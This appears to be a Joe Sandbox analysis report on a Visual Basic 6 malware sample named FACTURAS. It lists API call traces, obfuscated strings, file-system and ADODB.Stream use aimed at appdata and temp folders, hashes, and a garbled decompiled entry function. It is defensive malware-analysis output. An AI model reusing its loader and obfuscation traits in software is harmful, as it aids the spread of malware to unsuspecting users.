#515.MSVBVM60(?,?,0000002F,?,00000003,0000000A,00000001,00000001), ref: 0041CA4F
#645.MSVBVM60(?,00000000,?,?,0000002F,?,00000003,0000000A,00000001,00000001), ref: 0041CA5D
__vbaStrMove.MSVBVM60(?,00000000,?,?,0000002F,?,00000003,0000000A,00000001,00000001), ref: 0041CA67
__vbaStrCopy.MSVBVM60(?,00000000,?,?,0000002F,?,00000003,0000000A,00000001,00000001), ref: 0041CA74
__vbaFreeStr.MSVBVM60(?,00000000,?,?,0000002F,?,00000003,0000000A,00000001,00000001), ref: 0041CA7C
__vbaFreeVarList.MSVBVM60(00000004,00000003,0000000A,?,?,?,00000000,?,?,0000002F,?,00000003,0000000A,00000001,00000001), ref: 0041CA9F
__vbaOnError.MSVBVM60(00000000,?,?,?,?,?,?,?,00401396), ref: 0041CAB4
#554.MSVBVM60(00000000,?,?,?,?,?,?,?,00401396), ref: 0041CAB9
__vbaNew2.MSVBVM60(00402D44,004223F0,00000000,?,?,?,?,?,?,?,00401396), ref: 0041CAD1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041CB33
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,00000108), ref: 0041CB92
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,00000108), ref: 0041CBB4
#690.MSVBVM60(Turcize6,Sacrocotyloidean8,SLIDFAST,opfrisk), ref: 0041CBCD
__vbaVarDup.MSVBVM60(Turcize6,Sacrocotyloidean8,SLIDFAST,opfrisk), ref: 0041CBFC
#705.MSVBVM60(?,00000000), ref: 0041CC0A
__vbaStrMove.MSVBVM60(?,00000000), ref: 0041CC14
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0041CC1F
__vbaLenBstr.MSVBVM60(LAPIDATOR,?,00000000), ref: 0041CC29
__vbaStrI4.MSVBVM60(00000000,LAPIDATOR,?,00000000), ref: 0041CC2F
__vbaStrMove.MSVBVM60(00000000,LAPIDATOR,?,00000000), ref: 0041CC39
__vbaStrCopy.MSVBVM60(00000000,LAPIDATOR,?,00000000), ref: 0041CC46
__vbaFreeStr.MSVBVM60(00000000,LAPIDATOR,?,00000000), ref: 0041CC4E
__vbaNew2.MSVBVM60(00402D44,004223F0,00000000,LAPIDATOR,?,00000000), ref: 0041CC66
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041CCC8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,000000D0), ref: 0041CD24
__vbaStrMove.MSVBVM60(00000000,?,00402D54,000000D0), ref: 0041CD4E
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,000000D0), ref: 0041CD56
#716.MSVBVM60(?,ADODB.Stream,00000000), ref: 0041CD69
__vbaObjVar.MSVBVM60(?,?,ADODB.Stream,00000000), ref: 0041CD75
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,ADODB.Stream,00000000), ref: 0041CD7F
__vbaFreeVar.MSVBVM60(?,00000000,?,?,ADODB.Stream,00000000), ref: 0041CD8A
#716.MSVBVM60(?,ADODB.Stream,00000000,?,?,?,?,?,?,?,00401396), ref: 0041CDA8
__vbaObjVar.MSVBVM60(?,?,ADODB.Stream,00000000,?,?,?,?,?,?,?,00401396), ref: 0041CDB4
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,ADODB.Stream,00000000,?,?,?,?,?,?,?,00401396), ref: 0041CDBE
__vbaFreeVar.MSVBVM60(?,00000000,?,?,ADODB.Stream,00000000,?,?,?,?,?,?,?,00401396), ref: 0041CDC9
__vbaVarDup.MSVBVM60(?,00000000,?,?,ADODB.Stream,00000000,?,00000000,?,?,ADODB.Stream,00000000), ref: 0041CDEE
#667.MSVBVM60(?), ref: 0041CDFA
__vbaStrMove.MSVBVM60(?), ref: 0041CE04
#527.MSVBVM60(00000000,?), ref: 0041CE0A
__vbaStrMove.MSVBVM60(00000000,?), ref: 0041CE14
__vbaFreeStr.MSVBVM60(00000000,?), ref: 0041CE1C
__vbaFreeVar.MSVBVM60(00000000,?), ref: 0041CE27
#648.MSVBVM60(0000000A,00000000,?), ref: 0041CE4F
__vbaFreeVar.MSVBVM60(0000000A,00000000,?), ref: 0041CE64
#696.MSVBVM60(Besjlede,0000000A,00000000,?), ref: 0041CE7F
#648.MSVBVM60(0000000A,Besjlede,0000000A,00000000,?), ref: 0041CEE2
__vbaFreeVar.MSVBVM60(0000000A,Besjlede,0000000A,00000000,?), ref: 0041CEFD
#523.MSVBVM60(Mitiest,0000000A,Besjlede,0000000A,00000000,?), ref: 0041CF19
__vbaStrMove.MSVBVM60(Mitiest,0000000A,Besjlede,0000000A,00000000,?), ref: 0041CF23
#696.MSVBVM60(trussereder,?,?,?,?,?,?,?,00401396), ref: 0041CF2D
__vbaLenBstr.MSVBVM60(TILFRSEL), ref: 0041CF5F
__vbaHresultCheckObj.MSVBVM60(?,?,00402988,000006F8), ref: 0041CFC7
__vbaVarDup.MSVBVM60(?,?,00402988,000006F8), ref: 0041D006
#607.MSVBVM60(?,000000DB,?), ref: 0041D01E
__vbaStrVarVal.MSVBVM60(?,?,?,000000DB,?), ref: 0041D02E
#696.MSVBVM60(00000000,?,?,?,000000DB,?), ref: 0041D034
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,000006FC), ref: 0041D07C
__vbaFreeStr.MSVBVM60(00000000,?,00402988,000006FC), ref: 0041D093
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041D0A8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,00000700), ref: 0041D0E0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,00000704), ref: 0041D14F
#692.MSVBVM60(?,promisingness,Venerologisk3), ref: 0041D180
#685.MSVBVM60(?,promisingness,Venerologisk3), ref: 0041D185
__vbaObjSet.MSVBVM60(?,00000000,?,promisingness,Venerologisk3), ref: 0041D18F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402ECC,0000001C), ref: 0041D1D6
__vbaStrVarMove.MSVBVM60(?), ref: 0041D204
__vbaStrMove.MSVBVM60(?), ref: 0041D20E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,00000708), ref: 0041D262
__vbaFreeStr.MSVBVM60(00000000,?,00402988,00000708), ref: 0041D284
__vbaFreeObj.MSVBVM60(00000000,?,00402988,00000708), ref: 0041D28C
__vbaFreeVar.MSVBVM60(00000000,?,00402988,00000708), ref: 0041D297
#539.MSVBVM60(?,000000C5,000000A2,00000057), ref: 0041D2AF
#651.MSVBVM60(00000002,?,000000C5,000000A2,00000057), ref: 0041D2CF
__vbaStrMove.MSVBVM60(00000002,?,000000C5,000000A2,00000057), ref: 0041D2D9
__vbaStrMove.MSVBVM60(00000002,?,000000C5,000000A2,00000057), ref: 0041D2FD
__vbaStrVarVal.MSVBVM60(?,?,?,PYLOROSTENOSIS,00002846,?,00000002,?,000000C5,000000A2,00000057), ref: 0041D32D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,0000070C), ref: 0041D36A
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D398
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,trussereder), ref: 0041D3B0
__vbaVarDup.MSVBVM60 ref: 0041D3EC
#629.MSVBVM60(?,?,00000051,00000002), ref: 0041D408
#616.MSVBVM60(photosensitiser,000000BC,?,?,00000051,00000002), ref: 0041D417
__vbaStrMove.MSVBVM60(photosensitiser,000000BC,?,?,00000051,00000002), ref: 0041D421
__vbaVarDup.MSVBVM60(?,?,photosensitiser,000000BC,?,?,00000051,00000002), ref: 0041D446
#607.MSVBVM60(?,000000CF,?,?,?,photosensitiser,000000BC,?,?,00000051,00000002), ref: 0041D45E
__vbaStrVarMove.MSVBVM60(?,?,000000CF,?,?,?,photosensitiser,000000BC,?,?,00000051,00000002), ref: 0041D480
__vbaStrMove.MSVBVM60(?,?,000000CF,?,?,?,photosensitiser,000000BC,?,?,00000051,00000002), ref: 0041D48A
__vbaStrVarVal.MSVBVM60(?,?,000052D6,00003E74,?,?,?,000000CF,?,?,?,photosensitiser,000000BC,?,?,00000051), ref: 0041D4AD
__vbaStrMove.MSVBVM60(00000000,?,?,000052D6,00003E74,?,?,?,000000CF,?,?,?,photosensitiser,000000BC,?,?), ref: 0041D4BC
__vbaLenBstrB.MSVBVM60(00000000,00000000,?,?,000052D6,00003E74,?,?,?,000000CF,?,?,?,photosensitiser,000000BC,?), ref: 0041D4C2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,00000710,?,?,?,?,?,?,?,?,?,photosensitiser,000000BC,?), ref: 0041D4FC
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000), ref: 0041D52E
__vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041D55B
__vbaLenBstr.MSVBVM60(chaussebrolgnings), ref: 0041D5BE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,00000714), ref: 0041D613
#648.MSVBVM60(0000000A), ref: 0041D63F
__vbaFreeVar.MSVBVM60 ref: 0041D6A7
__vbaStrI4.MSVBVM60(004EAD83), ref: 0041D6B1
__vbaStrMove.MSVBVM60(004EAD83), ref: 0041D6BB
#696.MSVBVM60(00000000,004EAD83), ref: 0041D6C1
#611.MSVBVM60(00000000,004EAD83), ref: 0041D6CD
__vbaStrMove.MSVBVM60(00000000,004EAD83), ref: 0041D6D7
__vbaStrMove.MSVBVM60(00006082,00000000,004EAD83), ref: 0041D6F7
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D71F

Part of subcall function 00420D84: __vbaChkstk.MSVBVM60(?,0041D72C), ref: 00420D8A
Part of subcall function 00420D84: #644.MSVBVM60(?,?,0041D72C), ref: 00420DB4

__vbaVarMove.MSVBVM60 ref: 0041D749
__vbaVarMove.MSVBVM60 ref: 0041D76B
__vbaVarIdiv.MSVBVM60(0000000A,?,?), ref: 0041D77F
__vbaI4Var.MSVBVM60(00000000,0000000A,?,?), ref: 0041D785
__vbaFreeVar.MSVBVM60(0041D840), ref: 0041D7FA
__vbaFreeObj.MSVBVM60(0041D840), ref: 0041D802
__vbaFreeStr.MSVBVM60(0041D840), ref: 0041D80A
__vbaFreeStr.MSVBVM60(0041D840), ref: 0041D812
__vbaFreeStr.MSVBVM60(0041D840), ref: 0041D81A
__vbaFreeStr.MSVBVM60(0041D840), ref: 0041D822
__vbaFreeVar.MSVBVM60(0041D840), ref: 0041D82A
__vbaFreeObj.MSVBVM60(0041D840), ref: 0041D832
__vbaFreeStr.MSVBVM60(0041D840), ref: 0041D83A

Strings

photosensitiser, xrefs: 0041D412
userprofile, xrefs: 0041CDCE
opfrisk, xrefs: 0041CBB9
forkul, xrefs: 0041D682
fl, xrefs: 0041D0F4
F(, xrefs: 0041D2DE
PA, xrefs: 0041D2B4
LAPIDATOR, xrefs: 0041CC24
UROSIGNALERNES, xrefs: 0041D10E
PYLOROSTENOSIS, xrefs: 0041D319
Mitiest, xrefs: 0041CF14
trussereder, xrefs: 0041CF28
chaussebrolgnings, xrefs: 0041D5B9
ADODB.Stream, xrefs: 0041CD5D, 0041CD9C
Sacrocotyloidean8, xrefs: 0041CBC3
SLIDFAST, xrefs: 0041CBBE
Besjlede, xrefs: 0041CE7A
9/9/9, xrefs: 0041CBDC
promisingness, xrefs: 0041D174
heminee, xrefs: 0041D5CB
TILFRSEL, xrefs: 0041CF5A
Venerologisk3, xrefs: 0041D16F
., xrefs: 0041D3B8
Turcize6, xrefs: 0041CBC8
STATUTTERNES, xrefs: 0041CF76

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$Move$CheckHresult$List$#696Bstr$#648$#607#716AddrefChkstkCopyNew2$#515#519#523#527#539#554#611#616#629#644#645#647#651#660#667#685#690#692#705ErrorIdiv
String ID: .$9/9/9$ADODB.Stream$Besjlede$F($LAPIDATOR$Mitiest$PA$PYLOROSTENOSIS$SLIDFAST$STATUTTERNES$Sacrocotyloidean8$TILFRSEL$Turcize6$UROSIGNALERNES$Venerologisk3$chaussebrolgnings$fl$forkul$heminee$opfrisk$photosensitiser$promisingness$trussereder$userprofile
API String ID: 3516384700-3747505185
Opcode ID: 8d6cd7b8fd8fe29aabf2ef570d4ee878eb558a0a5438e8d236a8b365e08c8638
Instruction ID: 9f350eacd96625a8e8268e2a0d1f558e396a0bef4d2487ec0f431909302e4807
Opcode Fuzzy Hash: 8d6cd7b8fd8fe29aabf2ef570d4ee878eb558a0a5438e8d236a8b365e08c8638
Instruction Fuzzy Hash: F2923A7194021DABDB21DF90CD46FDDB7B8BF04304F0045AAE609BB1A1DBB99A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004202E8, Relevance: 249.2, APIs: 123, Strings: 19, Instructions: 696
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 00420305
__vbaStrCopy.MSVBVM60(?,?,?,?,00401396), ref: 0042031D
#514.MSVBVM60(Sternotracheal5,000000C1), ref: 0042033A
__vbaStrMove.MSVBVM60(Sternotracheal5,000000C1), ref: 00420344
#696.MSVBVM60(00000000,Sternotracheal5,000000C1), ref: 0042034A
#648.MSVBVM60(0000000A,00000000,Sternotracheal5,000000C1), ref: 00420356
__vbaFreeStr.MSVBVM60(0000000A,00000000,Sternotracheal5,000000C1), ref: 0042036F
__vbaFreeVar.MSVBVM60(0000000A,00000000,Sternotracheal5,000000C1), ref: 00420377
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,0000000A,00000000,Sternotracheal5,000000C1), ref: 004203A5
#515.MSVBVM60(?,0000000A,000000ED,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004203B7
__vbaStrVarMove.MSVBVM60(?,?,0000000A,000000ED), ref: 004203C0
__vbaStrMove.MSVBVM60(?,?,0000000A,000000ED), ref: 004203CA
__vbaStrCopy.MSVBVM60(?,?,0000000A,000000ED), ref: 004203DA
__vbaFreeStr.MSVBVM60(?,?,0000000A,000000ED), ref: 004203E2
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,0000000A,000000ED), ref: 004203F1
#535.MSVBVM60 ref: 004203F9
__vbaVarDup.MSVBVM60 ref: 00420421
#667.MSVBVM60(?), ref: 0042042A
__vbaStrMove.MSVBVM60(?), ref: 00420434
__vbaStrMove.MSVBVM60(00000011,?), ref: 00420451
#514.MSVBVM60(00000000,00000011,?), ref: 00420457
__vbaStrMove.MSVBVM60(00000000,00000011,?), ref: 00420461
__vbaStrCopy.MSVBVM60(00000000,00000011,?), ref: 00420471
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000,00000000,00000011,?), ref: 00420484
__vbaFreeVar.MSVBVM60 ref: 0042048F
#697.MSVBVM60(00006488), ref: 00420499
__vbaStrMove.MSVBVM60(00006488), ref: 004204A3
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,0000000A,00000000,Sternotracheal5,000000C1), ref: 004204C2
#528.MSVBVM60(?,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,0000000A,00000000), ref: 004204CF
#517.MSVBVM60(picktooth,?,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004204D9
__vbaVarTstNe.MSVBVM60(00008008,?,picktooth,?,0000000A), ref: 004204F0
__vbaFreeVarList.MSVBVM60(00000003,0000000A,?,00008008,00008008,?,picktooth,?,0000000A), ref: 0042050A
__vbaLenBstrB.MSVBVM60(INFRASCAPULAR), ref: 00420537
__vbaNew2.MSVBVM60(00402D44,004223F0,INFRASCAPULAR), ref: 0042056A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 004205CC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,00000108), ref: 0042062B
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,00000108), ref: 0042064D
#581.MSVBVM60(tungtvejendes), ref: 00420657
__vbaFpI4.MSVBVM60(tungtvejendes), ref: 0042065C
__vbaFreeStr.MSVBVM60(004206B6,tungtvejendes), ref: 004206A8
__vbaFreeStr.MSVBVM60(004206B6,tungtvejendes), ref: 004206B0

Strings

Velseslokaler2, xrefs: 00420833
userprofile, xrefs: 00420407
\uLeVLTlngarzDsxDxFry75Ru4, xrefs: 00420AC9
Sternotracheal5, xrefs: 00420335
INFRASCAPULAR, xrefs: 00420532
Wrothily, xrefs: 004208C0
INCOGNITE, xrefs: 004208F4
picktooth, xrefs: 004204D4
Skifflegrupperne, xrefs: 00420A77
CreateTextFile, xrefs: 004209E0
tungtvejendes, xrefs: 00420652
\Ffbziag21THawVfLdzos3x101, xrefs: 00420984
\Bh2BSU9xxO49MYboEPptixGKslvKjoQApxmsXHE151, xrefs: 004207B6
Umload4, xrefs: 00420A23
Scripting.FileSystemObject, xrefs: 00420935
appdata, xrefs: 00420790, 00420AA3
Desarmering4, xrefs: 004204A8
Lejevrdistigningernes, xrefs: 0042038B
TMP, xrefs: 0042095E

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$Move$CopyList$#514CheckHresult$#515#517#528#535#581#648#667#696#697BstrChkstkNew2
String ID: CreateTextFile$Desarmering4$INCOGNITE$INFRASCAPULAR$Lejevrdistigningernes$Scripting.FileSystemObject$Skifflegrupperne$Sternotracheal5$TMP$Umload4$Velseslokaler2$Wrothily$\Bh2BSU9xxO49MYboEPptixGKslvKjoQApxmsXHE151$\Ffbziag21THawVfLdzos3x101$\uLeVLTlngarzDsxDxFry75Ru4$appdata$picktooth$tungtvejendes$userprofile
API String ID: 3606919766-1028660707
Opcode ID: e2fb398d311ba17dbc9b5ca092fbc3145fe999b1f7a1fee7aede9f6dfb758483
Instruction ID: 881ca92dfe5f261a31e04b3e40a9012ada558439fc7f63fe75374041b4814d6c
Opcode Fuzzy Hash: e2fb398d311ba17dbc9b5ca092fbc3145fe999b1f7a1fee7aede9f6dfb758483
Instruction Fuzzy Hash: 73522C71900208ABDB11EFA1CD46FDEB7B8AF04304F50457AF505BB1E2DB799A49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004025B4, Relevance: 15.1, APIs: 10, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(00000000,00401396,?,?,?,00000000), ref: 00420BC3
__vbaObjSetAddref.MSVBVM60(00000000,?,?,00000000,?,00000000,00401396), ref: 00420BDC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402958,00000058), ref: 00420C08
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00420C23
#644.MSVBVM60(?,?,?), ref: 00420C2C
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 00420C3D
__vbaChkstk.MSVBVM60(00000000,?,?,00000000,?,?,?), ref: 00420C82
__vbaChkstk.MSVBVM60(00000000,?,?,00000000,?,?,?), ref: 00420C93
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402958,000002B0), ref: 00420CCA
__vbaFreeObj.MSVBVM60(00420CF1), ref: 00420CEB

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: e56b674742cfc386bfc9e71206ad499bd21cd30ccd20008f7ef8374e30aef507
Instruction ID: 2c8f50cf0ce147b20e5c8e33546bec5075f2dad1807e2f3c839ccf2d5c2f7f20
Opcode Fuzzy Hash: e56b674742cfc386bfc9e71206ad499bd21cd30ccd20008f7ef8374e30aef507
Instruction Fuzzy Hash: 04315AB1940618EFDF01EF91D84AADEBBB5FF04304F50442AF900BB5A1C7B99986DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401698, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			_entry_(signed int __eax, intOrPtr* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				signed int _t30;
				signed int _t31;
				signed int _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;
				void* _t38;
				void* _t39;
				intOrPtr* _t40;
				void* _t42;

				_t39 = __edi;
				_t38 = __edx;
				_t36 = __ecx;
				_t34 = __ebx;
				_push("VB5!6&*"); // executed
				L00401690(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				do {
					 *__eax =  *__eax + __eax;
					 *__eax =  *__eax + __eax;
					 *__eax =  *__eax + __eax;
				} while ( *__eax < 0);
				asm("rcl byte [ecx-0x65], cl");
				asm("fsubr dword [edx]");
				asm("cmpsd");
				_t42 = 0xfaa5268;
				_pop(_t30);
				asm("stc");
				while(1) {
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					_t38 = _t38 + 1;
					asm("popfd");
					asm("aam 0x0");
					asm("das");
					_t30 =  *0x69676445;
					if(_t38 < 0) {
						break;
					}
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					_t34 = _t34 + _t34;
					 *_t30 =  *_t30 ^ _t30;
					 *_t34 =  *_t34 + _t38;
					asm("repe shl byte [ebx-0x76], cl");
					_t42 = _t42 + 1;
					asm("lodsb");
					_t40 = es;
				}
				asm("adc [edi+0xaa000c], esi");
				asm("pushad");
				asm("rcl dword [ebx], cl");
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				asm("adc cl, [ecx]");
				 *_t30 =  *_t30 + _t30;
				_t31 = _t30 | 0x00000009;
				_push(es);
				_t1 = _t36 + 0x65;
				 *_t1 =  *(_t36 + 0x65) + _t34;
				__eflags =  *_t1;
				if(__eflags >= 0) {
					if(__eflags >= 0) {
						L11:
						 *_t40 =  *_t40 + _t38;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t36;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 | _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *((char*)(_t31 + _t31)) =  *((char*)(_t31 + _t31));
						 *_t31 =  *_t31 + _t31;
						__eflags =  *_t31;
						L12:
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						asm("invalid");
						 *_t31 =  *_t31 + 1;
						_t10 = _t39 + 0x76dc00e2;
						 *_t10 =  *(_t39 + 0x76dc00e2) + _t31;
						__eflags =  *_t10;
					} else {
						 *0x67000801 =  *0x67000801 + _t36;
						__eflags =  *0x67000801;
						if( *0x67000801 >= 0) {
							asm("o16 insb");
							_t38 = _t38 + 1;
							 *_t34 =  *_t34 + _t31;
							asm("invalid");
							 *_t31 =  *_t31 + _t31;
							__eflags =  *_t31;
							asm("insb");
							if ( *_t31 == 0) goto L10;
							 *((intOrPtr*)(_t40 + 8)) =  *((intOrPtr*)(_t40 + 8)) + _t34;
							 *_t36 =  *_t36 + _t31;
							 *_t36 =  *_t36 + _t31;
							 *_t31 =  *_t31 + _t31;
							 *_t31 =  *_t31 & _t31;
							 *_t36 =  *_t36 + _t31;
							 *_t31 =  *_t31 + _t36;
							_t6 = _t31 + 0x16000008;
							 *_t6 =  *(_t31 + 0x16000008) + _t36;
							__eflags =  *_t6;
							goto L11;
						}
					}
				}
				_t31 = _t31 + _t34;
				__eflags = _t31;
				if(__eflags > 0) {
					 *_t36 =  *_t36 + _t38;
					_t36 = 0xff96002d;
					_t33 =  *_t31;
					 *((intOrPtr*)(_t40 + 0x6c)) =  *((intOrPtr*)(_t40 + 0x6c)) + 0xff96002d;
					 *((intOrPtr*)(_t40 + _t33 * 8 - 1)) =  *((intOrPtr*)(_t40 + _t33 * 8 - 1)) + _t34;
					 *0xFFFFFFFFFF9600A6 =  *0xFFFFFFFFFF9600A6 + _t34;
					__eflags =  *0xFFFFFFFFFF9600A6;
					if ( *0xFFFFFFFFFF9600A6 >= 0) goto L15;
					asm("outsb");
					asm("popad");
					_t31 = _t33 + 0x70b5e400;
					__eflags = _t31;
				}
				if (__eflags < 0) goto L17;
				_push(_t36);
				asm("lahf");
				_t34 = _t34 + _t36;
				asm("xlatb");
				 *_t31 = 0x49;
				_t36 = _t36;
				 *((intOrPtr*)(_t36 - 0x24)) =  *((intOrPtr*)(_t36 - 0x24)) + _t31;
				asm("pushad");
				_t24 = _t34 + 0x37;
				 *_t24 =  *(_t34 + 0x37) + _t36;
				__eflags =  *_t24;
				if( *_t24 <= 0) {
					goto L12;
				}
				 *((intOrPtr*)(_t36 + 0x3b5c)) =  *((intOrPtr*)(_t36 + 0x3b5c)) + _t31;
				asm("daa");
				__eflags = _t34 + _t34;
				asm("cld");
				return _t31 ^ 0x8a883600;
			}

0x00401698
0x00401698
0x00401698
0x00401698
0x00401698
0x0040169d
0x004016a2
0x004016a4
0x004016a6
0x004016a8
0x004016aa
0x004016ac
0x004016ae
0x004016b0
0x004016b2
0x004016b2
0x004016b6
0x004016b9
0x004016bc
0x004016bd
0x004016c2
0x004016c3
0x004016c4
0x004016c4
0x004016c6
0x004016c8
0x004016ca
0x004016cc
0x004016ce
0x004016cf
0x004016d0
0x004016d2
0x004016d3
0x004016d8
0x00000000
0x00000000
0x004016db
0x004016dd
0x004016df
0x004016e2
0x004016e4
0x004016e8
0x004016ec
0x004016ed
0x004016ef
0x004016ef
0x0040170c
0x00401712
0x00401713
0x00401719
0x0040171b
0x0040171d
0x0040171f
0x00401721
0x00401723
0x00401725
0x00401727
0x00401729
0x0040172b
0x0040172d
0x0040172f
0x00401731
0x00401733
0x00401735
0x00401737
0x00401739
0x0040173b
0x0040173d
0x00401742
0x00401743
0x00401743
0x00401743
0x00401746
0x00401748
0x0040177b
0x0040177b
0x0040177d
0x0040177f
0x00401781
0x00401783
0x00401785
0x00401787
0x0040178a
0x0040178c
0x0040178e
0x00401790
0x00401792
0x00401794
0x00401798
0x00401798
0x0040179a
0x0040179a
0x0040179c
0x0040179e
0x004017a0
0x004017a2
0x004017a4
0x004017a6
0x004017a8
0x004017aa
0x004017ac
0x004017ae
0x004017b0
0x004017b0
0x004017b0
0x0040174a
0x0040174a
0x0040174a
0x00401750
0x00401752
0x0040175b
0x0040175c
0x0040175e
0x00401760
0x00401760
0x00401762
0x00401763
0x00401765
0x0040176b
0x0040176d
0x0040176f
0x00401771
0x00401773
0x00401775
0x00401777
0x00401777
0x00401777
0x00000000
0x00401777
0x00401750
0x00401748
0x004017b3
0x004017b3
0x004017b5
0x004017b7
0x004017b9
0x004017be
0x004017c0
0x004017c3
0x004017c7
0x004017c7
0x004017ca
0x004017cc
0x004017cd
0x004017ce
0x004017ce
0x004017ce
0x004017d2
0x004017d4
0x004017d5
0x004017db
0x004017dd
0x004017de
0x004017e2
0x004017e3
0x004017e6
0x004017e7
0x004017e7
0x004017e7
0x004017ed
0x00000000
0x00000000
0x004017ef
0x004017f5
0x004017fb
0x004017fd
0x004017fe

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040169D

Strings

VB5!6&*, xrefs: 00401698

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
